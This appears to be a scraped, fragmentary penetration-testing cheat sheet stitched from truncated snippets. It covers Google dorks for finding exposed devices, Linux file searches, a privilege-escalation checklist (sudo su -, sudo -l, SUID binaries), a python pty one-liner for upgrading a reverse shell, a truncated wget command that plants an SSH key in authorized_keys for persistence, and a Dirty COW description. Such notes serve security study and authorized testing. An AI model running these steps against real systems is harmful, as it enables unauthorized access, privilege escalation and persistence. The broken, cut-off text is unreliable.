Google search to find website sub domains
Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf
Google Hacking Database:
Set the Target IP Address to the $ip system variable
Find the location of a file
Search through directories in the $PATH environment variable
Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*
Show active int...
Scripts to run
The following script runs exploit suggester and automatically downloads and executes suggested exploits:
Linux elevation of privileges, manual testing
Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.
First try simple sudo:
$ sudo su -
What can we run with sudo?
$ sudo -l
Try su as all users ...
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Add public key to authorized keys:
$ echo $(wget https://A...
Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...